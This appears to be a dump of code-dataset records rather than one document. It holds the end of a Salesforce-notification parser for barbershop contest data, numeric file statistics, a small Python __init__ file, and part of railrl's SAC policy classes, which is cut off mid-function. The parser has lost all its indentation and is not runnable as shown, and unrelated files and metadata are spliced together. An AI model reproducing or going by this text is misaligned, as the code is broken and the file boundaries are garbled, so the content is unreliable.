d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Name
if hasattr(n, 'sf_Name'):
d['title'] = n.sf_Name.cdata
# Arrangers
if hasattr(n, 'sf_Arrangers__c'):
d['arrangers'] = n.sf_Arrangers__c.cdata
# Composer
d['composers'] = n.sf_Composers__c.cdata if hasattr(n, 'sf_Composers__c') else ""
# Lyricist
d['lyricists'] = n.sf_Lyricists__c.cdata if hasattr(n, 'sf_Lyricists__c') else ""
# Holders
d['holders'] = n.sf_Holders__c.cdata if hasattr(n, 'sf_Holders__c') else ""
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# Notes
d['notes'] = n.sf_Notes__c.cdata if hasattr(n, 'sf_Notes__c') else ""
# Return parsed dict
return d
class SfGroup:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Name
if hasattr(n, 'sf_Name'):
d['name'] = n.sf_Name.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Kind
if hasattr(n, 'sf_BS_Kind__c'):
d['kind'] = int(float(n.sf_BS_Kind__c.cdata))
# Gender
if hasattr(n, 'sf_BS_Classification__c'):
d['gender'] = int(float(n.sf_BS_Classification__c.cdata))
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Divisions
d['division'] = int(float(n.sf_BS_Division__c.cdata)) if hasattr(n, 'sf_BS_Division__c') else None
# bhs_id
if hasattr(n, 'sf_cfg_Member_Id__c') and n.sf_cfg_Member_Id__c.cdata.isalnum():
# Is a Chorus
# code
d['code'] = n.sf_cfg_Member_Id__c.cdata if hasattr(n, 'sf_cfg_Member_Id__c') else ""
elif hasattr(n, 'sf_cfg_Member_Id__c'):
# Is a Quartet
d['bhs_id'] = int(n.sf_cfg_Member_Id__c.cdata) if hasattr(n, 'sf_cfg_Member_Id__c') else None
# Return parsed dict
return d
class SfPerson:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Name
if hasattr(n, 'sf_FirstName') and hasattr(n, 'sf_LastName'):
d['name'] = n.sf_FirstName.cdata + " " + n.sf_LastName.cdata
# First Name
d['first_name'] = n.sf_FirstName.cdata if hasattr(n, 'sf_FirstName') else ""
# Last Name
d['last_name'] = n.sf_LastName.cdata if hasattr(n, 'sf_LastName') else ""
# part
d['part'] = int(float(n.sf_BS_VoicePart__c.cdata)) if hasattr(n, 'sf_BS_VoicePart__c') else None
# Gender
d['gender'] = int(float(n.sf_BS_Gender__c.cdata)) if hasattr(n, 'sf_BS_Gender__c') else None
# Email
d['email'] = n.sf_npe01__HomeEmail__c.cdata if hasattr(n, 'sf_npe01__HomeEmail__c') else ""
# Home Phone
d['home_phone'] = n.sf_HomePhone.cdata if hasattr(n, 'sf_HomePhone') else ""
# Cell Phone
d['cell_phone'] = n.sf_MobilePhone.cdata if hasattr(n, 'sf_MobilePhone') else ""
# BHS ID
d['bhs_id'] = int(n.sf_cfg_Member_Number__c.cdata) if hasattr(n, 'sf_cfg_Member_Number__c') else None
# Return parsed dict
return d
class SfSession:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Kind
if hasattr(n, 'sf_BS_Kind__c'):
d['kind'] = int(float(n.sf_BS_Kind__c.cdata))
# Num Rounds
if hasattr(n, 'sf_Num_rounds__c'):
d['num_rounds'] = int(float(n.sf_Num_rounds__c.cdata))
# Is Invitational
if hasattr(n, 'sf_is_invitational__c'):
d['is_invitational'] = bool(strtobool(n.sf_is_invitational__c.cdata))
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# Notes
d['notes'] = n.sf_Notes__c.cdata if hasattr(n, 'sf_Notes__c') else ""
# Footnotes
d['footnotes'] = n.sf_Footnotes__c.cdata if hasattr(n, 'sf_Footnotes__c') else ""
if hasattr(n, 'sf_BS_Convention_UUID__c'):
d['convention_id'] = n.sf_BS_Convention_UUID__c.cdata
# Name
if hasattr(n, 'sf_Name'):
d['name'] = n.sf_Name.cdata
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Season
if hasattr(n, 'sf_BS_Season__c'):
d['season'] = int(float(n.sf_BS_Season__c.cdata))
# Panel
if hasattr(n, 'sf_BS_Panel__c'):
d['panel'] = int(float(n.sf_BS_Panel__c.cdata))
# Year
if hasattr(n, 'sf_Year__c'):
d['year'] = int(n.sf_Year__c.cdata)
# Open Date
if hasattr(n, 'sf_Open_Date__c'):
d['open_date'] = n.sf_Open_Date__c.cdata
# Close Date
if hasattr(n, 'sf_Close_Date__c'):
d['close_date'] = n.sf_Close_Date__c.cdata
# Start Date
if hasattr(n, 'sf_Start_Date__c'):
d['start_date'] = n.sf_Start_Date__c.cdata
# End Date
if hasattr(n, 'sf_End_Date__c'):
d['end_date'] = n.sf_End_Date__c.cdata
# Venue
if hasattr(n, 'sf_Venue__c'):
d['venue_name'] = n.sf_Venue__c.cdata
# Location
if hasattr(n, 'sf_Location__c'):
d['location'] = n.sf_Location__c.cdata
# Time Zone
if hasattr(n, 'sf_Time_Zone__c'):
d['timezone'] = n.sf_Time_Zone__c.cdata
# Divisions
if hasattr(n, 'sf_BS_Division__c'):
d['divisions'] = n.sf_BS_Division__c.cdata
# Return parsed dict
return d
class SfContest:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Award ID
if hasattr(n, 'sf_BS_Award_UUID__c'):
d['award_id'] = n.sf_BS_Award_UUID__c.cdata
# Name
if hasattr(n, 'sf_Name'):
d['name'] = n.sf_Name.cdata
# Kind
if hasattr(n, 'sf_BS_Kind__c'):
d['kind'] = int(float(n.sf_BS_Kind__c.cdata))
# Gender
d['gender'] = int(float(n.sf_BS_Classification__c.cdata)) if hasattr(n, 'sf_BS_Classification__c') else None
# Level
if hasattr(n, 'sf_BS_Level__c'):
d['level'] = int(float(n.sf_BS_Level__c.cdata))
# Season
if hasattr(n, 'sf_BS_Season__c'):
d['season'] = int(float(n.sf_BS_Season__c.cdata))
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Divisions
d['division'] = int(float(n.sf_BS_Division__c.cdata)) if hasattr(n, 'sf_BS_Division__c') else None
# Age
d['age'] = int(float(n.sf_BS_Age__c.cdata)) if hasattr(n, 'sf_BS_Age__c') else None
# Is Novice
if hasattr(n, 'sf_is_novice__c'):
d['is_novice'] = bool(strtobool(n.sf_is_novice__c.cdata))
# Is Single
if hasattr(n, 'sf_is_single__c'):
d['is_single'] = bool(strtobool(n.sf_is_single__c.cdata))
# Size
d['size'] = int(float(n.sf_BS_Size__c.cdata)) if hasattr(n, 'sf_BS_Size__c') else None
# Size Range
d['size_range'] = n.sf_Size_Range__c.cdata if hasattr(n, 'sf_Size_Range__c') else None
# Scope
d['scope'] = int(float(n.sf_BS_Scope__c.cdata)) if hasattr(n, 'sf_BS_Scope__c') else None
# Scope Range
d['scope_range'] = n.sf_Scope_Range__c.cdata if hasattr(n, 'sf_Scope_Range__c') else None
# Tree Sort
d['tree_sort'] = int(float(n.sf_Tree_Sort__c.cdata)) if hasattr(n, 'sf_Tree_Sort__c') else None
# Session ID
if hasattr(n, 'sf_BS_Session_UUID__c'):
d['session_id'] = n.sf_BS_Session_UUID__c.cdata
# Return parsed dict
return d
class SfAssignment:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Kind
if hasattr(n, 'sf_BS_Type__c'):
d['kind'] = int(float(n.sf_BS_Type__c.cdata))
# Category
if hasattr(n, 'sf_BS_Category__c'):
d['category'] = int(float(n.sf_BS_Category__c.cdata))
# Person ID
if hasattr(n, 'sf_BS_Contact_UUID__c'):
d['person_id'] = n.sf_BS_Contact_UUID__c.cdata
# Name
d['name'] = n.sf_Name__c.cdata if hasattr(n, 'sf_Name__c') else None
# First Name
d['first_name'] = n.sf_FirstName__c.cdata if hasattr(n, 'sf_FirstName__c') else None
# Last Name
d['last_name'] = n.sf_LastName__c.cdata if hasattr(n, 'sf_LastName__c') else None
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Area
if hasattr(n, 'sf_Area__c'):
d['area'] = n.sf_Area__c.cdata
# Email
d['email'] = n.sf_HomeEmail__c.cdata if hasattr(n, 'sf_HomeEmail__c') else None
# Cell Phone
d['cell_phone'] = n.sf_MobilePhone__c.cdata if hasattr(n, 'sf_MobilePhone__c') else None
# Airports
d['airports'] = n.sf_Airports__c.cdata if hasattr(n, 'sf_Airports__c') else None
# BHS ID
d['bhs_id'] = int(n.sf_cfg_Member_Number__c.cdata) if hasattr(n, 'sf_cfg_Member_Number__c') else None
# Session ID
if hasattr(n, 'sf_BS_Session_UUID__c'):
d['session_id'] = n.sf_BS_Session_UUID__c.cdata
# Return parsed dict
return d
class SfEntry:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Is Evaluation
if hasattr(n, 'sf_is_evaluation__c'):
d['is_evaluation'] = bool(strtobool(n.sf_is_evaluation__c.cdata))
# Is Private
if hasattr(n, 'sf_is_private__c'):
d['is_private'] = bool(strtobool(n.sf_is_private__c.cdata))
# Is MT
if hasattr(n, 'sf_is_mt__c'):
d['is_mt'] = bool(strtobool(n.sf_is_mt__c.cdata))
# Is Senior
if hasattr(n, 'sf_is_senior__c'):
d['is_senior'] = bool(strtobool(n.sf_is_senior__c.cdata))
# Is Youth
if hasattr(n, 'sf_is_youth__c'):
d['is_youth'] = bool(strtobool(n.sf_is_youth__c.cdata))
# Draw
d['draw'] = int(float(n.sf_Draw_Order__c.cdata)) if hasattr(n, 'sf_Draw_Order__c') else None
# Prelim
d['prelim'] = float(n.sf_Prelim__c.cdata) if hasattr(n, 'sf_Prelim__c') else None
# Base
d['base'] = float(n.sf_Base__c.cdata) if hasattr(n, 'sf_Base__c') else None
# Participants
d['participants'] = n.sf_Participants__c.cdata if hasattr(n, 'sf_Participants__c') else ""
# POS
d['pos'] = int(float(n.sf_Persons_On_Stage__c.cdata)) if hasattr(n, 'sf_Persons_On_Stage__c') else None
# Area
if hasattr(n, 'sf_Organization__c'):
d['area'] = n.sf_Organization__c.cdata
# Chapters
d['chapters'] = n.sf_Chapters__c.cdata if hasattr(n, 'sf_Chapters__c') else ""
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# Notes
d['notes'] = n.sf_Notes__c.cdata if hasattr(n, 'sf_Notes__c') else ""
# Group ID
if hasattr(n, 'sf_BS_Account_UUID__c'):
d['group_id'] = n.sf_BS_Account_UUID__c.cdata
# Name
if hasattr(n, 'sf_Name'):
d['name'] = n.sf_Name.cdata
# Kind
if hasattr(n, 'sf_BS_Kind__c'):
d['kind'] = int(float(n.sf_BS_Kind__c.cdata))
# Gender
if hasattr(n, 'sf_BS_Classification__c'):
d['gender'] = int(float(n.sf_BS_Classification__c.cdata))
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Divisions
d['division'] = int(float(n.sf_BS_Division__c.cdata)) if hasattr(n, 'sf_BS_Division__c') else None
if hasattr(n, 'sf_cfg_Member_Id__c'):
if (n.sf_cfg_Member_Id__c.cdata.isdigit()):
# BHS ID
d['bhs_id'] = int(n.sf_cfg_Member_Id__c.cdata)
else:
# code
d['code'] = n.sf_cfg_Member_Id__c.cdata
# Session ID
if hasattr(n, 'sf_BS_Session_UUID__c'):
d['session_id'] = n.sf_BS_Session_UUID__c.cdata
# Return parsed dict
return d
class SfEntryContest:
def parse_sf_notification(n):
d = {}
# Contest UUID
if hasattr(n, 'sf_BS_Contest_UUID__c'):
d['contest_id'] = n.sf_BS_Contest_UUID__c.cdata
# Entry UUID
if hasattr(n, 'sf_BS_Entry_UUID__c'):
d['entry_id'] = n.sf_BS_Entry_UUID__c.cdata
# Is Deleted
if hasattr(n, 'sf_IsDeleted'):
d['deleted'] = bool(strtobool(n.sf_IsDeleted.cdata))
# Return parsed dict
return d
class SfGroupChart:
def parse_sf_notification(n):
d = {}
# Group UUID
if hasattr(n, 'sf_BS_Account_UUID__c'):
d['group_id'] = n.sf_BS_Account_UUID__c.cdata
# Chart UUID
if hasattr(n, 'sf_BS_Chart_UUID__c'):
d['chart_id'] = n.sf_BS_Chart_UUID__c.cdata
# Is Deleted
if hasattr(n, 'sf_IsDeleted'):
d['deleted'] = bool(strtobool(n.sf_IsDeleted.cdata))
# Return parsed dict
return d
| 29.887228
| 116
| 0.576169
| 3,155
| 21,997
| 3.622187
| 0.05103
| 0.092142
| 0.153133
| 0.181659
| 0.860606
| 0.807578
| 0.735212
| 0.721124
| 0.688134
| 0.677721
| 0
| 0.000258
| 0.295677
| 21,997
| 735
| 117
| 29.927891
| 0.737365
| 0.074919
| 0
| 0.720588
| 0
| 0
| 0.1926
| 0.018551
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032353
| false
| 0
| 0.014706
| 0
| 0.111765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48d98084301ed528e1a9c6542931e9937af6b22e
| 191
|
py
|
Python
|
gacha_elper/error/__init__.py
|
rahagi/gacha-elper
|
e81bd82c3416a01e448ba1ce2515252235facdac
|
[
"MIT"
] | null | null | null |
gacha_elper/error/__init__.py
|
rahagi/gacha-elper
|
e81bd82c3416a01e448ba1ce2515252235facdac
|
[
"MIT"
] | null | null | null |
gacha_elper/error/__init__.py
|
rahagi/gacha-elper
|
e81bd82c3416a01e448ba1ce2515252235facdac
|
[
"MIT"
] | null | null | null |
from .adb_not_found import *
from .adb_no_devices import *
from .elper_invalid_find_mode import *
from .elper_invalid_similarity_range import *
from .elper_invalid_crop_bounding_box import *
| 31.833333
| 46
| 0.842932
| 29
| 191
| 5.068966
| 0.551724
| 0.272109
| 0.306122
| 0.44898
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104712
| 191
| 5
| 47
| 38.2
| 0.859649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d2f6d0bcddafd1b32dcf43212757cbee60c7632a
| 34,580
|
py
|
Python
|
railrl/torch/sac/policies.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
railrl/torch/sac/policies.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
railrl/torch/sac/policies.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
from torch import nn as nn
from railrl.policies.base import ExplorationPolicy, Policy
from railrl.torch.core import eval_np
from railrl.torch.distributions import TanhNormal, Normal, GaussianMixture
from railrl.torch.networks import Mlp, CNN
from railrl.torch.vae.vae_base import GaussianLatentVAE
import railrl.torch.pytorch_util as ptu
import torch.nn.functional as F
LOG_SIG_MAX = 2
LOG_SIG_MIN = -20
class TanhGaussianPolicyAdapter(nn.Module, ExplorationPolicy):
"""
Usage:
```
obs_processor = ...
policy = TanhGaussianPolicyAdapter(obs_processor)
```
"""
def __init__(
self,
obs_processor,
obs_processor_output_dim,
action_dim,
hidden_sizes,
):
super().__init__()
self.obs_processor = obs_processor
self.obs_processor_output_dim = obs_processor_output_dim
self.mean_and_log_std_net = Mlp(
hidden_sizes=hidden_sizes,
output_size=action_dim*2,
input_size=obs_processor_output_dim,
)
self.action_dim = action_dim
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic)[0]
def forward(
self,
obs,
reparameterize=True,
deterministic=False,
return_log_prob=False,
return_entropy=False,
return_log_prob_of_mean=False,
):
"""
:param obs: Observation
:param deterministic: If True, do not sample
:param return_log_prob: If True, return a sample and its log probability
:param return_entropy: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
:param return_log_prob_of_mean: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
"""
h = self.obs_processor(obs)
h = self.mean_and_log_std_net(h)
mean, log_std = torch.split(h, self.action_dim, dim=1)
log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
std = torch.exp(log_std)
log_prob = None
entropy = None
mean_action_log_prob = None
pre_tanh_value = None
tanh_normal = TanhNormal(mean, std)
if deterministic:
action = torch.tanh(mean)
else:
tanh_normal = TanhNormal(mean, std)
if return_log_prob:
if reparameterize is True:
action, pre_tanh_value = tanh_normal.rsample(
return_pretanh_value=True
)
else:
action, pre_tanh_value = tanh_normal.sample(
return_pretanh_value=True
)
log_prob = tanh_normal.log_prob(
action,
pre_tanh_value=pre_tanh_value
)
log_prob = log_prob.sum(dim=1, keepdim=True)
else:
if reparameterize is True:
action = tanh_normal.rsample()
else:
action = tanh_normal.sample()
if return_entropy:
entropy = log_std + 0.5 + np.log(2 * np.pi) / 2
# I'm not sure how to compute the (differential) entropy for a
# tanh(Gaussian)
entropy = entropy.sum(dim=1, keepdim=True)
raise NotImplementedError()
if return_log_prob_of_mean:
tanh_normal = TanhNormal(mean, std)
mean_action_log_prob = tanh_normal.log_prob(
torch.tanh(mean),
pre_tanh_value=mean,
)
mean_action_log_prob = mean_action_log_prob.sum(dim=1, keepdim=True)
return (
action, mean, log_std, log_prob, entropy, std,
mean_action_log_prob, pre_tanh_value, tanh_normal
)
def log_prob_aviral(self, obs, actions):
def atanh(x):
one_plus_x = (1 + x).clamp(min=1e-6)
one_minus_x = (1 - x).clamp(min=1e-6)
return 0.5 * torch.log(one_plus_x / one_minus_x)
raw_actions = atanh(actions)
h = self.obs_processor(obs)
h = self.mean_and_log_std_net(h)
mean, log_std = torch.split(h, self.action_dim, dim=1)
log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
std = torch.exp(log_std)
tanh_normal = TanhNormal(mean, std)
log_prob = tanh_normal.log_prob(value=actions, pre_tanh_value=raw_actions)
return log_prob.sum(-1)
# noinspection PyMethodOverriding
class TanhGaussianPolicy(Mlp, ExplorationPolicy):
"""
Usage:
```
policy = TanhGaussianPolicy(...)
action, mean, log_std, _ = policy(obs)
action, mean, log_std, _ = policy(obs, deterministic=True)
action, mean, log_std, log_prob = policy(obs, return_log_prob=True)
```
Here, mean and log_std are the mean and log_std of the Gaussian that is
sampled from.
If deterministic is True, action = tanh(mean).
If return_log_prob is False (default), log_prob = None
This is done because computing the log_prob can be a bit expensive.
"""
def __init__(
self,
hidden_sizes,
obs_dim,
action_dim,
std=None,
init_w=1e-3,
**kwargs
):
super().__init__(
hidden_sizes,
input_size=obs_dim,
output_size=action_dim,
init_w=init_w,
**kwargs
)
self.log_std = None
self.std = std
if std is None:
last_hidden_size = obs_dim
if len(hidden_sizes) > 0:
last_hidden_size = hidden_sizes[-1]
self.last_fc_log_std = nn.Linear(last_hidden_size, action_dim)
self.last_fc_log_std.weight.data.uniform_(-init_w, init_w)
self.last_fc_log_std.bias.data.uniform_(-init_w, init_w)
else:
self.log_std = np.log(std)
assert LOG_SIG_MIN <= self.log_std <= LOG_SIG_MAX
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic)[0]
def forward(
self,
obs,
reparameterize=True,
deterministic=False,
return_log_prob=False,
return_entropy=False,
return_log_prob_of_mean=False,
):
"""
:param obs: Observation
:param deterministic: If True, do not sample
:param return_log_prob: If True, return a sample and its log probability
:param return_entropy: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
:param return_log_prob_of_mean: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
"""
h = obs
for i, fc in enumerate(self.fcs):
h = self.hidden_activation(fc(h))
mean = self.last_fc(h)
if self.std is None:
log_std = self.last_fc_log_std(h)
log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
std = torch.exp(log_std)
else:
std = torch.from_numpy(np.array([self.std, ])).float().to(ptu.device)
log_std = torch.log(std) # self.log_std
log_prob = None
entropy = None
mean_action_log_prob = None
pre_tanh_value = None
tanh_normal = TanhNormal(mean, std)
if deterministic:
action = torch.tanh(mean)
else:
tanh_normal = TanhNormal(mean, std)
if return_log_prob:
if reparameterize is True:
action, pre_tanh_value = tanh_normal.rsample(
return_pretanh_value=True
)
else:
action, pre_tanh_value = tanh_normal.sample(
return_pretanh_value=True
)
log_prob = tanh_normal.log_prob(
action,
pre_tanh_value=pre_tanh_value
)
log_prob = log_prob.sum(dim=1, keepdim=True)
else:
if reparameterize is True:
action = tanh_normal.rsample()
else:
action = tanh_normal.sample()
if return_entropy:
entropy = log_std + 0.5 + np.log(2 * np.pi) / 2
# I'm not sure how to compute the (differential) entropy for a
# tanh(Gaussian)
entropy = entropy.sum(dim=1, keepdim=True)
raise NotImplementedError()
if return_log_prob_of_mean:
tanh_normal = TanhNormal(mean, std)
mean_action_log_prob = tanh_normal.log_prob(
torch.tanh(mean),
pre_tanh_value=mean,
)
mean_action_log_prob = mean_action_log_prob.sum(dim=1, keepdim=True)
return (
action, mean, log_std, log_prob, entropy, std,
mean_action_log_prob, pre_tanh_value, tanh_normal
)
def logprob(self, action, mean, std):
# import ipdb; ipdb.set_trace()
tanh_normal = TanhNormal(mean, std)
log_prob = tanh_normal.log_prob(
action,
)
log_prob = log_prob.sum(dim=1, keepdim=True)
return log_prob
def log_prob_aviral(self, obs, actions):
def atanh(x):
one_plus_x = (1 + x).clamp(min=1e-6)
one_minus_x = (1 - x).clamp(min=1e-6)
return 0.5 * torch.log(one_plus_x / one_minus_x)
raw_actions = atanh(actions)
h = obs
for i, fc in enumerate(self.fcs):
h = self.hidden_activation(fc(h))
mean = self.last_fc(h)
if self.std is None:
log_std = self.last_fc_log_std(h)
log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
std = torch.exp(log_std)
else:
std = self.std
log_std = self.log_std
tanh_normal = TanhNormal(mean, std)
log_prob = tanh_normal.log_prob(value=actions, pre_tanh_value=raw_actions)
return log_prob.sum(-1)
class GaussianPolicy(Mlp, ExplorationPolicy):
def __init__(
self,
hidden_sizes,
obs_dim,
action_dim,
std=None,
init_w=1e-3,
min_log_std=None,
max_log_std=None,
std_architecture="shared",
**kwargs
):
super().__init__(
hidden_sizes,
input_size=obs_dim,
output_size=action_dim,
init_w=init_w,
output_activation=torch.tanh,
**kwargs
)
self.min_log_std = min_log_std
self.max_log_std = max_log_std
self.log_std = None
self.std = std
self.std_architecture = std_architecture
if std is None:
if self.std_architecture == "shared":
last_hidden_size = obs_dim
if len(hidden_sizes) > 0:
last_hidden_size = hidden_sizes[-1]
self.last_fc_log_std = nn.Linear(last_hidden_size, action_dim)
self.last_fc_log_std.weight.data.uniform_(-init_w, init_w)
self.last_fc_log_std.bias.data.uniform_(-init_w, init_w)
elif self.std_architecture == "values":
self.log_std_logits = nn.Parameter(ptu.zeros(action_dim, requires_grad=True))
else:
error
else:
self.log_std = np.log(std)
assert LOG_SIG_MIN <= self.log_std <= LOG_SIG_MAX
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic)[0]
def forward(
self,
obs,
reparameterize=True,
deterministic=False,
return_log_prob=False,
return_entropy=False,
return_log_prob_of_mean=False,
):
"""
:param obs: Observation
:param deterministic: If True, do not sample
:param return_log_prob: If True, return a sample and its log probability
:param return_entropy: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
:param return_log_prob_of_mean: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
"""
h = obs
for i, fc in enumerate(self.fcs):
h = self.hidden_activation(fc(h))
preactivation = self.last_fc(h)
mean = self.output_activation(preactivation)
if self.std is None:
# log_std = self.last_fc_log_std(h)
# log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
if self.std_architecture == "shared":
log_std = torch.sigmoid(self.last_fc_log_std(h))
elif self.std_architecture == "values":
log_std = torch.sigmoid(self.log_std_logits)
else:
error
log_std = self.min_log_std + log_std * (self.max_log_std - self.min_log_std)
std = torch.exp(log_std)
else:
std = torch.from_numpy(np.array([self.std, ])).float().to(ptu.device)
log_std = torch.log(std) # self.log_std
log_prob = None
entropy = None
mean_action_log_prob = None
pre_tanh_value = None
normal = Normal(mean, std)
if deterministic:
action = mean
else:
if return_log_prob:
if reparameterize is True:
action = normal.rsample()
else:
action = normal.sample()
log_prob = normal.log_prob(action)
log_prob = log_prob.sum(dim=1, keepdim=True)
else:
if reparameterize is True:
action = normal.rsample()
else:
action = normal.sample()
if return_entropy:
entropy = log_std + 0.5 + np.log(2 * np.pi) / 2
# I'm not sure how to compute the (differential) entropy for a
# tanh(Gaussian)
entropy = entropy.sum(dim=1, keepdim=True)
raise NotImplementedError()
if return_log_prob_of_mean:
normal = Normal(mean, std)
mean_action_log_prob = normal.log_prob(mean)
mean_action_log_prob = mean_action_log_prob.sum(dim=1, keepdim=True)
return (
action, mean, log_std, log_prob, entropy, std,
mean_action_log_prob, pre_tanh_value, normal,
)
class GaussianMixturePolicy(Mlp, ExplorationPolicy):
def __init__(
self,
hidden_sizes,
obs_dim,
action_dim,
std=None,
init_w=1e-3,
min_log_std=None,
max_log_std=None,
num_gaussians=1,
std_architecture="shared",
**kwargs
):
super().__init__(
hidden_sizes,
input_size=obs_dim,
output_size=action_dim * num_gaussians,
init_w=init_w,
# output_activation=torch.tanh,
**kwargs
)
self.action_dim = action_dim
self.num_gaussians = num_gaussians
self.min_log_std = min_log_std
self.max_log_std = max_log_std
self.log_std = None
self.std = std
self.std_architecture = std_architecture
if std is None:
last_hidden_size = obs_dim
if len(hidden_sizes) > 0:
last_hidden_size = hidden_sizes[-1]
if self.std_architecture == "shared":
self.last_fc_log_std = nn.Linear(last_hidden_size, action_dim * num_gaussians)
self.last_fc_log_std.weight.data.uniform_(-init_w, init_w)
self.last_fc_log_std.bias.data.uniform_(-init_w, init_w)
elif self.std_architecture == "values":
self.log_std_logits = nn.Parameter(ptu.zeros(action_dim * num_gaussians, requires_grad=True))
else:
error
else:
self.log_std = np.log(std)
assert LOG_SIG_MIN <= self.log_std <= LOG_SIG_MAX
self.last_fc_weights = nn.Linear(last_hidden_size, num_gaussians)
self.last_fc_weights.weight.data.uniform_(-init_w, init_w)
self.last_fc_weights.bias.data.uniform_(-init_w, init_w)
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic)[0]
def forward(
self,
obs,
